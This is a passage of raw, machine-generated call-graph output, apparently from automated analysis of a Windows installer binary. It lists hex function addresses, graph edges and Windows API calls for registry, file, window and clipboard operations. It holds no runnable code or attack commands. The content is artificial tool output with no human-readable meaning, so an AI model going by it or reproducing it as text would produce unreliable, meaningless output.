403d9b 4373->4375 4374->4357 4375->4374 4376 401dd3 4377 401446 18 API calls 4376->4377 4378 401dda 4377->4378 4379 401446 18 API calls 4378->4379 4380 4018d3 4379->4380 4381 402e55 4382 40145c 18 API calls 4381->4382 4383 402e63 4382->4383 4384 402e79 4383->4384 4385 40145c 18 API calls 4383->4385 4386 405e5c 2 API calls 4384->4386 4385->4384 4387 402e7f 4386->4387 4411 405e7c GetFileAttributesW CreateFileW 4387->4411 4389 402e8c 4390 402f35 4389->4390 4391 402e98 GlobalAlloc 4389->4391 4394 4062cf 11 API calls 4390->4394 4392 402eb1 4391->4392 4393 402f2c CloseHandle 4391->4393 4412 403368 SetFilePointer 4392->4412 4393->4390 4396 402f45 4394->4396 4398 402f50 DeleteFileW 4396->4398 4399 402f63 4396->4399 4397 402eb7 4400 403336 ReadFile 4397->4400 4398->4399 4413 401435 4399->4413 4402 402ec0 GlobalAlloc 4400->4402 4403 402ed0 4402->4403 4404 402f04 WriteFile GlobalFree 4402->4404 4406 40337f 33 API calls 4403->4406 4405 40337f 33 API calls 4404->4405 4407 402f29 4405->4407 4410 402edd 4406->4410 4407->4393 4409 402efb GlobalFree 4409->4404 4410->4409 4411->4389 4412->4397 4414 404f9e 25 API calls 4413->4414 4415 401443 4414->4415 4416 401cd5 4417 401446 18 API calls 4416->4417 4418 401cdd 4417->4418 4419 401446 18 API calls 4418->4419 4420 401ce8 4419->4420 4421 40145c 18 API calls 4420->4421 4422 401cf1 4421->4422 4423 401d07 lstrlenW 4422->4423 4424 401d43 4422->4424 4425 401d11 4423->4425 4425->4424 4429 406035 lstrcpynW 4425->4429 4427 401d2c 4427->4424 4428 401d39 lstrlenW 4427->4428 4428->4424 4429->4427 4430 402cd7 4431 401446 18 API calls 4430->4431 4433 402c64 4431->4433 4432 402d17 ReadFile 4432->4433 4433->4430 4433->4432 4434 402d99 4433->4434 4435 402dd8 4436 4030e3 4435->4436 4437 402ddf 4435->4437 4438 402de5 FindClose 4437->4438 4438->4436 4439 401d5c 4440 40145c 18 API calls 4439->4440 4441 401d63 4440->4441 4442 40145c 18 API calls 4441->4442 4443 401d6c 4442->4443 4444 401d73 lstrcmpiW 4443->4444 4445 401d86 lstrcmpW 4443->4445 4446 401d79 4444->4446 4445->4446 4447 401c99 4445->4447 4446->4445 4446->4447 4448 4027e3 4449 4027e9 4448->4449 4450 4027f2 4449->4450 4451 402836 4449->4451 4464 401553 4450->4464 4452 40145c 18 API calls 4451->4452 4454 40283d 4452->4454 4456 4062cf 11 API calls 4454->4456 4455 4027f9 4457 40145c 18 API calls 4455->4457 4461 401a13 4455->4461 4458 40284d 4456->4458 4459 40280a RegDeleteValueW 4457->4459 4468 40149d RegOpenKeyExW 4458->4468 4460 4062cf 11 API calls 4459->4460 4463 40282a RegCloseKey 4460->4463 4463->4461 4465 401563 4464->4465 4466 40145c 18 API calls 4465->4466 4467 401589 RegOpenKeyExW 4466->4467 4467->4455 4471 4014c9 4468->4471 4476 401515 4468->4476 4469 4014ef RegEnumKeyW 4470 401501 RegCloseKey 4469->4470 4469->4471 4473 406328 3 API calls 4470->4473 4471->4469 4471->4470 4472 401526 RegCloseKey 4471->4472 4474 40149d 3 API calls 4471->4474 4472->4476 4475 401511 4473->4475 4474->4471 4475->4476 4477 401541 RegDeleteKeyW 4475->4477 4476->4461 4477->4476 4478 4040e4 4479 4040ff 4478->4479 4485 40422d 4478->4485 4481 40413a 4479->4481 4509 403ff6 WideCharToMultiByte 4479->4509 4480 404298 4482 40436a 4480->4482 4483 4042a2 GetDlgItem 4480->4483 4489 403d6b 19 API calls 4481->4489 4490 403df6 8 API calls 4482->4490 4486 40432b 4483->4486 4487 4042bc 4483->4487 4485->4480 4485->4482 4488 404267 GetDlgItem SendMessageW 4485->4488 4486->4482 4491 40433d 4486->4491 4487->4486 4495 4042e2 6 API calls 4487->4495 4514 403db1 KiUserCallbackDispatcher 4488->4514 4493 40417a 4489->4493 4494 404365 4490->4494 4496 404353 4491->4496 4497 404343 SendMessageW 4491->4497 4499 403d6b 19 API calls 4493->4499 4495->4486 4496->4494 4500 404359 SendMessageW 4496->4500 4497->4496 4498 404293 4501 403d8d SendMessageW 4498->4501 4502 404187 CheckDlgButton 4499->4502 4500->4494 4501->4480 4512 403db1 KiUserCallbackDispatcher 4502->4512 4504 4041a5 GetDlgItem 4513 403dc4 SendMessageW 4504->4513 4506 4041bb SendMessageW 4507 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4506->4507 4508 4041d8 GetSysColor 4506->4508 4507->4494 4508->4507 4510 404033 4509->4510 4511 404015 GlobalAlloc WideCharToMultiByte 4509->4511 4510->4481 4511->4510 4512->4504 4513->4506 4514->4498 4515 402ae4 4516 402aeb 4515->4516 4517 4030e3 4515->4517 4518 402af2 CloseHandle 4516->4518 4518->4517 4519 402065 4520 401446 18 API calls 4519->4520 4521 40206d 4520->4521 4522 401446 18 API calls 4521->4522 4523 402076 GetDlgItem 4522->4523 4524 4030dc 4523->4524 4525 4030e3 4524->4525 4527 405f7d wsprintfW 4524->4527 4527->4525 4528 402665 4529 40145c 18 API calls 4528->4529 4530 40266b 4529->4530 4531 40145c 18 API calls 4530->4531 4532 402674 4531->4532 4533 40145c 18 API calls 4532->4533 4534 40267d 4533->4534 4535 4062cf 11 API calls 4534->4535 4536 40268c 4535->4536 4537 406301 2 API calls 4536->4537 4538 402695 4537->4538 4539 4026a6 lstrlenW lstrlenW 4538->4539 4541 404f9e 25 API calls 4538->4541 4543 4030e3 4538->4543 4540 404f9e 25 API calls 4539->4540 4542 4026e8 SHFileOperationW 4540->4542 4541->4538 4542->4538 4542->4543 4544 401c69 4545 40145c 18 API calls 4544->4545 4546 401c70 4545->4546 4547 4062cf 11 API calls 4546->4547 4548 401c80 4547->4548 4549 405ccc MessageBoxIndirectW 4548->4549 4550 401a13 4549->4550 4551 402f6e 4552 402f72 4551->4552 4553 402fae 4551->4553 4555 4062cf 11 API calls 4552->4555 4554 40145c 18 API calls 4553->4554 4561 402f9d 4554->4561 4556 402f7d 4555->4556 4557 4062cf 11 API calls 4556->4557 4558 402f90 4557->4558 4559 402fa2 4558->4559 4560 402f98 4558->4560 4563 406113 9 API calls 4559->4563 4562 403ea0 5 API calls 4560->4562 4562->4561 4563->4561 4564 4023f0 4565 402403 4564->4565 4566 4024da 4564->4566 4567 40145c 18 API calls 4565->4567 4568 404f9e 25 API calls 4566->4568 4569 40240a 4567->4569 4572 4024f1 4568->4572 4570 40145c 18 API calls 4569->4570 4571 402413 4570->4571 4573 402429 LoadLibraryExW 4571->4573 4574 40241b GetModuleHandleW 4571->4574 4575 4024ce 4573->4575 4576 40243e 4573->4576 4574->4573 4574->4576 4578 404f9e 25 API calls 4575->4578 4588 406391 GlobalAlloc WideCharToMultiByte 4576->4588 4578->4566 4579 402449 4580 40248c 4579->4580 4581 40244f 4579->4581 4582 404f9e 25 API calls 4580->4582 4583 401435 25 API calls 4581->4583 4586 40245f 4581->4586 4584 402496 4582->4584 4583->4586 4585 4062cf 11 API calls 4584->4585 4585->4586 4586->4572 4587 4024c0 FreeLibrary 4586->4587 4587->4572 4589 4063c9 GlobalFree 4588->4589 4590 4063bc GetProcAddress 4588->4590 4589->4579 4590->4589 3430 402175 3431 401446 18 API calls 3430->3431 3432 40217c 3431->3432 3433 401446 18 API calls 3432->3433 3434 402186 3433->3434 3435 402197 3434->3435 3438 4062cf 11 API calls 3434->3438 3436 4021aa EnableWindow 3435->3436 3437 40219f ShowWindow 3435->3437 3439 4030e3 3436->3439 3437->3439 3438->3435 4591 4048f8 4592 404906 4591->4592 4593 40491d 4591->4593 4594 40490c 4592->4594 4609 404986 4592->4609 4595 40492b IsWindowVisible 4593->4595 4601 404942 4593->4601 4596 403ddb SendMessageW 4594->4596 4598 404938 4595->4598 4595->4609 4599 404916 4596->4599 4597 40498c CallWindowProcW 4597->4599 4610 40487a SendMessageW 4598->4610 4601->4597 4615 406035 lstrcpynW 4601->4615 4603 404971 4616 405f7d wsprintfW 4603->4616 4605 404978 4606 40141d 80 API calls 4605->4606 4607 40497f 4606->4607 4617 406035 lstrcpynW 4607->4617 4609->4597 4611 4048d7 SendMessageW 4610->4611 4612 40489d GetMessagePos ScreenToClient SendMessageW 4610->4612 4614 4048cf 4611->4614 4613 4048d4 4612->4613 4612->4614 4613->4611 4614->4601 4615->4603 4616->4605 4617->4609 3732 4050f9 3733 4052c1 3732->3733 3734 40511a GetDlgItem GetDlgItem GetDlgItem 3732->3734 3735 4052f2 3733->3735 3736 4052ca GetDlgItem CreateThread CloseHandle 3733->3736 3781 403dc4 SendMessageW 3734->3781 3738 405320 3735->3738 3740 405342 3735->3740 3741 40530c ShowWindow ShowWindow 3735->3741 3736->3735 3784 405073 OleInitialize 3736->3784 3742 40537e 3738->3742 3744 405331 3738->3744 3745 405357 ShowWindow 3738->3745 3739 40518e 3751 406831 18 API calls 3739->3751 3746 403df6 8 API calls 3740->3746 3783 403dc4 SendMessageW 3741->3783 3742->3740 3747 405389 SendMessageW 3742->3747 3748 403d44 SendMessageW 3744->3748 3749 405377 3745->3749 3750 405369 3745->3750 3756 4052ba 3746->3756 3755 4053a2 CreatePopupMenu 3747->3755 3747->3756 3748->3740 3754 403d44 SendMessageW 3749->3754 3752 404f9e 25 API calls 3750->3752 3753 4051ad 3751->3753 3752->3749 3757 4062cf 11 API calls 3753->3757 3754->3742 3758 406831 18 API calls 3755->3758 3759 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3757->3759 3760 4053b2 AppendMenuW 3758->3760 3761 405203 SendMessageW SendMessageW 3759->3761 3762 40521f 3759->3762 3763 4053c5 GetWindowRect 3760->3763 3764 4053d8 3760->3764 3761->3762 3765 405232 3762->3765 3766 405224 SendMessageW 3762->3766 3767 4053df TrackPopupMenu 3763->3767 3764->3767 3768 403d6b 19 API calls 3765->3768 3766->3765 3767->3756 3769 4053fd 3767->3769 3770 405242 3768->3770 3771 405419 SendMessageW 3769->3771 3772 40524b ShowWindow 3770->3772 3773 40527f GetDlgItem SendMessageW 3770->3773 3771->3771 3774 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3771->3774 3775 405261 ShowWindow 3772->3775 3776 40526e 3772->3776 3773->3756 3777 4052a2 SendMessageW SendMessageW 3773->3777 3778 40545b SendMessageW 3774->3778 3775->3776 3782 403dc4 SendMessageW 3776->3782 3777->3756 3778->3778 3779 405486 GlobalUnlock SetClipboardData CloseClipboard 3778->3779 3779->3756 3781->3739 3782->3773 3783->3738 3785 403ddb SendMessageW 3784->3785 3789 405096 3785->3789 3786 403ddb SendMessageW 3787 4050d1 OleUninitialize 3786->3787 3788 4062cf 11 API calls 3788->3789 3789->3788 3790 40139d 80 API calls 3789->3790 3791 4050c1 3789->3791 3790->3789 3791->3786 4618 4020f9 GetDC GetDeviceCaps 4619 401446 18 API calls 4618->4619 4620 402116 MulDiv 4619->4620 4621 401446 18 API calls 4620->4621 4622 40212c 4621->4622 4623 406831 18 API calls 4622->4623 4624 402165 CreateFontIndirectW 4623->4624 4625 4030dc 4624->4625 4626 4030e3 4625->4626 4628 405f7d wsprintfW 4625->4628 4628->4626 4629 4024fb 4630 40145c 18 API calls 4629->4630 4631 402502 4630->4631 4632 40145c 18 API calls 4631->4632 4633 40250c 4632->4633 4634 40145c 18 API calls 4633->4634 4635 402515 4634->4635 4636 40145c 18 API calls 4635->4636 4637 40251f 4636->4637 4638 40145c 18 API calls 4637->4638 4639 402529 4638->4639 4640 40253d 4639->4640 4641 40145c 18 API calls 4639->4641 4642 4062cf 11 API calls 4640->4642 4641->4640 4643 40256a CoCreateInstance 4642->4643 4644 40258c 4643->4644 4645 4026fc 4647 402708 4645->4647 4648 401ee4 4645->4648 4646 406831 18 API calls 4646->4648 4648->4645 4648->4646 3792 4019fd 3793 40145c 18 API calls 3792->3793 3794 401a04 3793->3794 3797 405eab 3794->3797 3798 405eb8 GetTickCount GetTempFileNameW 3797->3798 3799 401a0b 3798->3799 3800 405eee 3798->3800 3800->3798 3800->3799 4649 4022fd 4650 40145c 18 API calls 4649->4650 4651 402304 GetFileVersionInfoSizeW 4650->4651 4652 4030e3 4651->4652 4653 40232b GlobalAlloc 4651->4653 4653->4652 4654 40233f GetFileVersionInfoW 4653->4654 4655 402350 VerQueryValueW 4654->4655 4656 402381 GlobalFree 4654->4656 4655->4656 4657 402369 4655->4657 4656->4652 4662 405f7d wsprintfW 4657->4662 4660 402375 4663 405f7d wsprintfW 4660->4663 4662->4660 4663->4656 4664 402afd 4665 40145c 18 API calls 4664->4665 4666 402b04 4665->4666 4671 405e7c GetFileAttributesW CreateFileW 4666->4671 4668 402b10 4669 4030e3 4668->4669 4672 405f7d wsprintfW 4668->4672 4671->4668 4672->4669 4673 4029ff 4674 401553 19 API calls 4673->4674 4675 402a09 4674->4675 4676 40145c 18 API calls 4675->4676 4677 402a12 4676->4677 4678 402a1f RegQueryValueExW 4677->4678 4682 401a13 4677->4682 4679 402a45 4678->4679 4680 402a3f 4678->4680 4681 4029e4 RegCloseKey 4679->4681 4679->4682 4680->4679 4684 405f7d wsprintfW 4680->4684 4681->4682 4684->4679 4685 401000 4686 401037 BeginPaint GetClientRect 4685->4686 4687 40100c DefWindowProcW 4685->4687 4689 4010fc 4686->4689 4690 401182 4687->4690 4691 401073 CreateBrushIndirect FillRect DeleteObject 4689->4691 4692 401105 4689->4692 4691->4689 4693 401170 EndPaint 4692->4693 4694 40110b CreateFontIndirectW 4692->4694 4693->4690 4694->4693 4695 40111b 6 API calls 4694->4695 4695->4693 4696 401f80 4697 401446 18 API calls 4696->4697 4698 401f88 4697->4698 4699 401446 18 API calls 4698->4699 4700 401f93 4699->4700 4701 401fa3 4700->4701 4702 40145c 18 API calls 4700->4702 4703 401fb3 4701->4703 4704 40145c 18 API calls 4701->4704 4702->4701 4705 402006 4703->4705 4706 401fbc 4703->4706 4704->4703 4707 40145c 18 API calls 4705->4707 4708 401446 18 API calls 4706->4708 4709 40200d 4707->4709 4710 401fc4 4708->4710 4712 40145c 18 API calls 4709->4712 4711 401446 18 API calls 4710->4711 4713 401fce 4711->4713 4714 402016 FindWindowExW 4712->4714 4715 401ff6 SendMessageW 4713->4715 4716 401fd8 SendMessageTimeoutW 4713->4716 4718 402036 4714->4718 4715->4718 4716->4718 4717 4030e3 4718->4717 4720 405f7d wsprintfW 4718->4720 4720->4717 4721 402880 4722 402884 4721->4722 4723 40145c 18 API calls 4722->4723 4724 4028a7 4723->4724 4725 40145c 18 API calls 4724->4725 4726 4028b1 4725->4726 4727 4028ba RegCreateKeyExW 4726->4727 4728 4028e8 4727->4728 4733 4029ef 4727->4733 4729 402934 4728->4729 4731 40145c 18 API calls 4728->4731 4730 402963 4729->4730 4732 401446 18 API calls 4729->4732 4734 4029ae RegSetValueExW 4730->4734 4737 40337f 33 API calls 4730->4737 4735 4028fc lstrlenW 4731->4735 4736 402947 4732->4736 4740 4029c6 RegCloseKey 4734->4740 4741 4029cb 4734->4741 4738 402918 4735->4738 4739 40292a 4735->4739 4743 4062cf 11 API calls 4736->4743 4744 40297b 4737->4744 4745 4062cf 11 API calls 4738->4745 4746 4062cf 11 API calls 4739->4746 4740->4733 4742 4062cf 11 API calls 4741->4742 4742->4740 4743->4730 4752 406250 4744->4752 4749 402922 4745->4749 4746->4729 4749->4734 4751 4062cf 11 API calls 4751->4749 4753 406273 4752->4753 4754 4062b6 4753->4754 4755 406288 wsprintfW 4753->4755 4756 402991 4754->4756 4757 4062bf lstrcatW 4754->4757 4755->4754 4755->4755 4756->4751 4757->4756 4758 403d02 4759 403d0d 4758->4759 4760 403d11 4759->4760 4761 403d14 GlobalAlloc 4759->4761 4761->4760 4762 402082 4763 401446 18 API calls 4762->4763 4764 402093 SetWindowLongW 4763->4764 4765 4030e3 4764->4765 4766 402a84 4767 401553 19 API calls 4766->4767 4768 402a8e 4767->4768 4769 401446 18 API calls 4768->4769 4770 402a98 4769->4770 4771 401a13 4770->4771 4772 402ab2 RegEnumKeyW 4770->4772 4773 402abe RegEnumValueW 4770->4773 4774 402a7e 4772->4774 4773->4771 4773->4774 4774->4771 4775 4029e4 RegCloseKey 4774->4775 4775->4771 4776 402c8a 4777 402ca2 4776->4777 4778 402c8f 4776->4778 4780 40145c 18 API calls 4777->4780 4779 401446 18 API calls 4778->4779 4782 402c97 4779->4782 4781 402ca9 lstrlenW 4780->4781 4781->4782 4783 401a13 4782->4783 4784 402ccb WriteFile 4782->4784 4784->4783 4785 401d8e 4786 40145c 18 API calls 4785->4786 4787 401d95 ExpandEnvironmentStringsW 4786->4787 4788 401da8 4787->4788 4789 401db9 4787->4789 4788->4789 4790 401dad lstrcmpW 4788->4790 4790->4789 4791 401e0f 4792 401446 18 API calls 4791->4792 4793 401e17 4792->4793 4794 401446 18 API calls 4793->4794 4795 401e21 4794->4795 4796 4030e3 4795->4796 4798 405f7d wsprintfW 4795->4798 4798->4796 4799 40438f 4800 4043c8 4799->4800 4801 40439f 4799->4801 4802 403df6 8 API calls 4800->4802 4803 403d6b 19 API calls 4801->4803 4805 4043d4 4802->4805 4804 4043ac SetDlgItemTextW 4803->4804 4804->4800 4806 403f90 4807 403fa0 4806->4807 4808 403fbc 4806->4808 4817 405cb0 GetDlgItemTextW 4807->4817 4810 403fc2 SHGetPathFromIDListW 4808->4810 4811 403fef 4808->4811 4813 403fd2 4810->4813 4816 403fd9 SendMessageW 4810->4816 4812 403fad SendMessageW 4812->4808 4814 40141d 80 API calls 4813->4814 4814->4816 4816->4811 4817->4812 4818 402392 4819 40145c 18 API calls 4818->4819 4820 402399 4819->4820 4823 407224 4820->4823 4824 406efe 25 API calls 4823->4824 4825 407244 4824->4825 4826 4023a7 4825->4826 4827 40724e lstrcpynW lstrcmpW 4825->4827 4828 407280 4827->4828 4829 407286 lstrcpynW 4827->4829 4828->4829 4829->4826 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3402 406113 3360->3402 3379 40683e 3363->3379 3364 406aab 3365 401488 3364->3365 3397 406035 lstrcpynW 3364->3397 3365->3358 3381 406064 3365->3381 3367 4068ff GetVersion 3367->3379 3368 406a72 lstrlenW 3368->3379 3370 406831 10 API calls 3370->3368 3373 40697e GetSystemDirectoryW 3373->3379 3374 406064 5 API calls 3374->3379 3375 406991 GetWindowsDirectoryW 3375->3379 3376 406831 10 API calls 3376->3379 3377 406a0b lstrcatW 3377->3379 3378 4069c5 SHGetSpecialFolderLocation 3378->3379 3380 4069dd SHGetPathFromIDListW CoTaskMemFree 3378->3380 3379->3364 3379->3367 3379->3368 3379->3370 3379->3373 3379->3374 3379->3375 3379->3376 3379->3377 3379->3378 3390 405eff RegOpenKeyExW 3379->3390 3395 405f7d wsprintfW 3379->3395 3396 406035 lstrcpynW 3379->3396 3380->3379 3388 406071 3381->3388 3382 4060e7 3383 4060ed CharPrevW 3382->3383 3385 40610d 3382->3385 3383->3382 3384 4060da CharNextW 3384->3382 3384->3388 3385->3358 3387 4060c6 CharNextW 3387->3388 3388->3382 3388->3384 3388->3387 3389 4060d5 CharNextW 3388->3389 3398 405d32 3388->3398 3389->3384 3391 405f33 RegQueryValueExW 3390->3391 3392 405f78 3390->3392 3393 405f55 RegCloseKey 3391->3393 3392->3379 3393->3392 3395->3379 3396->3379 3397->3365 3399 405d38 3398->3399 3400 405d4e 3399->3400 3401 405d3f CharNextW 3399->3401 3400->3388 3401->3399 3403 40613c 3402->3403 3404 40611f 3402->3404 3406 4061b3 3403->3406 3407 406159 3403->3407 3408 40277f WritePrivateProfileStringW 3403->3408 3405 406129 CloseHandle 3404->3405 3404->3408 3405->3408 3406->3408 3409 4061bc lstrcatW lstrlenW WriteFile 3406->3409 3407->3409 3410 406162 GetFileAttributesW 3407->3410 3409->3408 3415 405e7c GetFileAttributesW CreateFileW 3410->3415 3412 40617e 3412->3408 3413 4061a8 SetFilePointer 3412->3413 3414 40618e WriteFile 3412->3414 3413->3406 3414->3413 3415->3412 4830 402797 4831 40145c 18 API calls 4830->4831 4832 4027ae 4831->4832 4833 40145c 18 API calls 4832->4833 4834 4027b7 4833->4834 4835 40145c 18 API calls 4834->4835 4836 4027c0 GetPrivateProfileStringW lstrcmpW 4835->4836 4837 401e9a 4838 40145c 18 API calls 4837->4838 4839 401ea1 4838->4839 4840 401446 18 API calls 4839->4840 4841 401eab wsprintfW 4840->4841 3801 401a1f 3802 40145c 18 API calls 3801->3802 3803 401a26 3802->3803 3804 4062cf 11 API calls 3803->3804 3805 401a49 3804->3805 3806 401a64 3805->3806 3807 401a5c 3805->3807 3876 406035 lstrcpynW 3806->3876 3875 406035 lstrcpynW 3807->3875 3810 401a6f 3877 40674e lstrlenW CharPrevW 3810->3877 3811 401a62 3814 406064 5 API calls 3811->3814 3845 401a81 3814->3845 3815 406301 2 API calls 3815->3845 3818 401a98 CompareFileTime 3818->3845 3819 401ba9 3820 404f9e 25 API calls 3819->3820 3822 401bb3 3820->3822 3821 401b5d 3823 404f9e 25 API calls 3821->3823 3854 40337f 3822->3854 3825 401b70 3823->3825 3829 4062cf 11 API calls 3825->3829 3827 406035 lstrcpynW 3827->3845 3828 4062cf 11 API calls 3830 401bda 3828->3830 3834 401b8b 3829->3834 3831 401be9 SetFileTime 3830->3831 3832 401bf8 CloseHandle 3830->3832 3831->3832 3832->3834 3835 401c09 3832->3835 3833 406831 18 API calls 3833->3845 3836 401c21 3835->3836 3837 401c0e 3835->3837 3838 406831 18 API calls 3836->3838 3839 406831 18 API calls 3837->3839 3840 401c29 3838->3840 3842 401c16 lstrcatW 3839->3842 3843 4062cf 11 API calls 3840->3843 3842->3840 3846 401c34 3843->3846 3844 401b50 3848 401b93 3844->3848 3849 401b53 3844->3849 3845->3815 3845->3818 3845->3819 3845->3821 3845->3827 3845->3833 3845->3844 3847 4062cf 11 API calls 3845->3847 3853 405e7c GetFileAttributesW CreateFileW 3845->3853 3880 405e5c GetFileAttributesW 3845->3880 3883 405ccc 3845->3883 3850 405ccc MessageBoxIndirectW 3846->3850 3847->3845 3851 4062cf 11 API calls 3848->3851 3852 4062cf 11 API calls 3849->3852 3850->3834 3851->3834 3852->3821 3853->3845 3855 40339a 3854->3855 3856 4033c7 3855->3856 3889 403368 SetFilePointer 3855->3889 3887 403336 ReadFile 3856->3887 3860 401bc6 3860->3828 3861 403546 3863 40354a 3861->3863 3864 40356e 3861->3864 3862 4033eb GetTickCount 3862->3860 3867 403438 3862->3867 3865 403336 ReadFile 3863->3865 3864->3860 3868 403336 ReadFile 3864->3868 3869 40358d WriteFile 3864->3869 3865->3860 3866 403336 ReadFile 3866->3867 3867->3860 3867->3866 3871 40348a GetTickCount 3867->3871 3872 4034af MulDiv wsprintfW 3867->3872 3874 4034f3 WriteFile 3867->3874 3868->3864 3869->3860 3870 4035a1 3869->3870 3870->3860 3870->3864 3871->3867 3873 404f9e 25 API calls 3872->3873 3873->3867 3874->3860 3874->3867 3875->3811 3876->3810 3878 401a75 lstrcatW 3877->3878 3879 40676b lstrcatW 3877->3879 3878->3811 3879->3878 3881 405e79 3880->3881 3882 405e6b SetFileAttributesW 3880->3882 3881->3845 3882->3881 3884 405ce1 3883->3884 3885 405d2f 3884->3885 3886 405cf7 MessageBoxIndirectW 3884->3886 3885->3845 3886->3885 3888 403357 3887->3888 3888->3860 3888->3861 3888->3862 3889->3856 4842 40209f GetDlgItem GetClientRect 4843 40145c 18 API calls 4842->4843 4844 4020cf LoadImageW SendMessageW 4843->4844 4845 4030e3 4844->4845 4846 4020ed DeleteObject 4844->4846 4846->4845 4847 402b9f 4848 401446 18 API calls 4847->4848 4852 402ba7 4848->4852 4849 402c4a 4850 402bdf ReadFile 4850->4852 4859 402c3d 4850->4859 4851 401446 18 API calls 4851->4859 4852->4849 4852->4850 4853 402c06 MultiByteToWideChar 4852->4853 4854 402c3f 4852->4854 4855 402c4f 4852->4855 4852->4859 4853->4852 4853->4855 4860 405f7d wsprintfW 4854->4860 4857 402c6b SetFilePointer 4855->4857 4855->4859 4857->4859 4858 402d17 ReadFile 4858->4859 4859->4849 4859->4851 4859->4858 4860->4849 3416 402b23 GlobalAlloc 3417 402b39 3416->3417 3418 402b4b 3416->3418 3427 401446 3417->3427 3420 40145c 18 API calls 3418->3420 3421 402b52 WideCharToMultiByte lstrlenA 3420->3421 3422 402b41 3421->3422 3423 402b84 WriteFile 3422->3423 3424 402b93 3422->3424 3423->3424 3425 402384 GlobalFree 3423->3425 3425->3424 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3422 4861 4040a3 4862 4040b0 lstrcpynW lstrlenW 4861->4862 4863 4040ad 4861->4863 4863->4862 3440 4054a5 3441 4055f9 3440->3441 3442 4054bd 3440->3442 3444 40564a 3441->3444 3445 40560a GetDlgItem GetDlgItem 3441->3445 3442->3441 3443 4054c9 3442->3443 3447 4054d4 SetWindowPos 3443->3447 3448 4054e7 3443->3448 3446 4056a4 3444->3446 3454 40139d 80 API calls 3444->3454 3449 403d6b 19 API calls 3445->3449 3455 4055f4 3446->3455 3510 403ddb 3446->3510 3447->3448 3451 405504 3448->3451 3452 4054ec ShowWindow 3448->3452 3453 405634 SetClassLongW 3449->3453 3456 405526 3451->3456 3457 40550c DestroyWindow 3451->3457 3452->3451 3458 40141d 80 API calls 3453->3458 3461 40567c 3454->3461 3459 40552b SetWindowLongW 3456->3459 3460 40553c 3456->3460 3462 405908 3457->3462 3458->3444 3459->3455 3463 4055e5 3460->3463 3464 405548 GetDlgItem 3460->3464 3461->3446 3465 405680 SendMessageW 3461->3465 3462->3455 3471 405939 ShowWindow 3462->3471 3530 403df6 3463->3530 3468 405578 3464->3468 3469 40555b SendMessageW IsWindowEnabled 3464->3469 3465->3455 3466 40141d 80 API calls 3479 4056b6 3466->3479 3467 40590a DestroyWindow KiUserCallbackDispatcher 3467->3462 3473 405585 3468->3473 3476 4055cc SendMessageW 3468->3476 3477 405598 3468->3477 3485 40557d 3468->3485 3469->3455 3469->3468 3471->3455 3472 406831 18 API calls 3472->3479 3473->3476 3473->3485 3475 403d6b 19 API calls 3475->3479 3476->3463 3480 4055a0 3477->3480 3481 4055b5 3477->3481 3478 4055b3 3478->3463 3479->3455 3479->3466 3479->3467 3479->3472 3479->3475 3501 40584a DestroyWindow 3479->3501 3513 403d6b 3479->3513 3524 40141d 3480->3524 3482 40141d 80 API calls 3481->3482 3484 4055bc 3482->3484 3484->3463 3484->3485 3527 403d44 3485->3527 3487 405731 GetDlgItem 3488 405746 3487->3488 3489 40574f ShowWindow KiUserCallbackDispatcher 3487->3489 3488->3489 3516 403db1 KiUserCallbackDispatcher 3489->3516 3491 405779 EnableWindow 3494 40578d 3491->3494 3492 405792 GetSystemMenu EnableMenuItem SendMessageW 3493 4057c2 SendMessageW 3492->3493 3492->3494 3493->3494 3494->3492 3517 403dc4 SendMessageW 3494->3517 3518 406035 lstrcpynW 3494->3518 3497 4057f0 lstrlenW 3498 406831 18 API calls 3497->3498 3499 405806 SetWindowTextW 3498->3499 3519 40139d 3499->3519 3501->3462 3502 405864 CreateDialogParamW 3501->3502 3502->3462 3503 405897 3502->3503 3504 403d6b 19 API calls 3503->3504 3505 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3504->3505 3506 40139d 80 API calls 3505->3506 3507 4058e8 3506->3507 3507->3455 3508 4058f0 ShowWindow 3507->3508 3509 403ddb SendMessageW 3508->3509 3509->3462 3511 403df3 3510->3511 3512 403de4 SendMessageW 3510->3512 3511->3479 3512->3511 3514 406831 18 API calls 3513->3514 3515 403d76 SetDlgItemTextW 3514->3515 3515->3487 3516->3491 3517->3494 3518->3497 3522 4013a4 3519->3522 3520 401410 3520->3479 3522->3520 3523 4013dd MulDiv SendMessageW 3522->3523 3544 4015a0 3522->3544 3523->3522 3525 40139d 80 API calls 3524->3525 3526 401432 3525->3526 3526->3485 3528 403d51 SendMessageW 3527->3528 3529 403d4b 3527->3529 3528->3478 3529->3528 3531 403e0b GetWindowLongW 3530->3531 3541 403e94 3530->3541 3532 403e1c 3531->3532 3531->3541 3533 403e2b GetSysColor 3532->3533 3534 403e2e 3532->3534 3533->3534 3535 403e34 SetTextColor 3534->3535 3536 403e3e SetBkMode 3534->3536 3535->3536 3537 403e56 GetSysColor 3536->3537 3538 403e5c 3536->3538 3537->3538 3539 403e63 SetBkColor 3538->3539 3540 403e6d 3538->3540 3539->3540 3540->3541 3542 403e80 DeleteObject 3540->3542 3543 403e87 CreateBrushIndirect 3540->3543 3541->3455 3542->3543 3543->3541 3545 4015fa 3544->3545 3624 40160c 3544->3624 3546 401601 3545->3546 3547 401742 3545->3547 3548 401962 3545->3548 3549 4019ca 3545->3549 3550 40176e 3545->3550 3551 401650 3545->3551 3552 4017b1 3545->3552 3553 401672 3545->3553 3554 401693 3545->3554 3555 401616 3545->3555 3556 4016d6 3545->3556 3557 401736 3545->3557 3558 401897 3545->3558 3559 4018db 3545->3559 3560 40163c 3545->3560 3561 4016bd 3545->3561 3545->3624 3570 4062cf 11 API calls 3546->3570 3562 401751 ShowWindow 3547->3562 3563 401758 3547->3563 3567 40145c 18 API calls 3548->3567 3574 40145c 18 API calls 3549->3574 3564 40145c 18 API calls 3550->3564 3588 4062cf 11 API calls 3551->3588 3568 40145c 18 API calls 